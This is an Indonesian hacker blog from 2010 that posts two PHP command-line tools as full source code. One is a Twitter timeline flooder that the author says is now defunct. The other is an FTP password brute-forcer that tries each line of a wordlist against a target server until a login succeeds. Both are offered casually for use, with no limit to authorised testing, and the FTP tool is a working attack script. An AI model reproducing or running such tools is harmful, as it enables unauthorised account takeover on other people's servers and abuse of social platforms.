Sabtu, 21 Agustus 2010

twitterfl00d3r.php

Fvcking Update: Dikarenakeun Twitter gak pakek XML itu lagi (Sekarang pakek OAuth, sux) jadi tool ini gak berguna lagi, DAMN...!!

Berjumpa lagi bersama saya di blog ini, ada script lagi neh, huakakakak namanya twitterfl00d3r, berfungsi untuk ngeflud timeline.

INGAT!
twitterfl00d3r dapat menyebabkan stroke, ditampol orang lain, dibejek2 ama orang lain, disambit orang lain, diunfollow orang lain, stroke, kejang2 dan lain2. diwajibkan pada seluruh pengguna twitterfl00d3r memakai pakaian lengkap plus kevlar saat menggunakan twitterfl00d3r, sangat tidak dianjurkan untuk bugil saat memakainya, pokoknya jangan!

Nih c0denya:
#!/usr/bin/php -q
<?php
error_reporting(0);
echo "Twitter Fl00d3r\n";
echo "by ne0 d4rk fl00d3r\n\n";
if (! $argv[1] OR ! $argv[2] OR ! $argv[3] OR ! is_numeric($argv[3]))
{
echo "Usages: ".$argv[0]." [username] [password] [number of tweet to send]\n";
echo "Example: ".$argv[0]." ne0d4rk mypwd 100\n";
exit();
}
$usr = $argv[1];
$pwd = $argv[2];
$twt = $argv[3];
echo "Sending tweets...........\n";
echo "Username: ".$usr."\nPassword: ".$pwd."\nNumber of tweet to send: ".$twt;
echo "\nIs that OK? [y/n] ";
$cfr = trim(fread(STDIN, 2));
if ($cfr=="n")
{
exit();
}
echo "\n\n";
echo "Sending........\n\n";
$c = curl_init();
curl_setopt($c, CURLOPT_URL, "http://twitter.com/statuses/update.xml");
curl_setopt($c, CURLOPT_USERPWD, $usr.":".$pwd);
for ($i=1; $i<=$twt; $i++)
{
$t = rand(1000, 10000000000000);
curl_setopt($c, CURLOPT_POSTFIELDS, "status=".$t.$i);
curl_exec($c);
}
curl_close($c);
echo "Flooding End\n";
?>

inget, ini php-cli
Sekian dan Terimakasih

Senin, 16 Agustus 2010

FTP Bruter by ne0 d4rk fl00d3r

Haloo...
ketemu lagi nih, eh, ngomong2 ada tools bruteforcer nih dari ne0d4rkfl00d3r

ini source codenya:

#!/usr/bin/php -q
<?
echo "#########################\n";
echo "## FTP Bruter ##\n";
echo "## by ne0 d4rk fl00d3r ##\n";
echo "#########################\n\n";
echo "Enter the FTP Server: ";
$hosts = fread(STDIN, 80);
$host = trim($hosts);
echo "\nEnter the Username: ";
$users = fread(STDIN, 80);
$user = trim($users);
echo "\nEnter the port of FTP Server (default is 21): ";
$ports = fread(STDIN, 80);
$port = trim($ports);
echo "\nEnter the wordlist for password to brute: ";
$words = fread(STDIN, 80);
$word = trim($words);
$cont = ftp_connect($host, $port);
if (! $cont)
{
echo "Could not connect to FTP Server!\n";
exit();
}
else if (! file_exists($word))
{
echo "Wordlist Not Found!\n";
exit();
}
$h = fopen($word, "r");
while (! feof($h))
{
$con = ftp_connect($host, $port);
$pwd = trim(fgets($h));
echo "Trying ".$pwd."\n";
if (@ftp_login($con, $user, $pwd))
{
echo "w00t! w00t! the password is: ".$pwd."\n";
exit();
}
else
{
echo "Incorrect\n";
}
ftp_close($con);
}
echo "Failed to bruteforce\n";
exit();
?>

Sekian dan terimakasih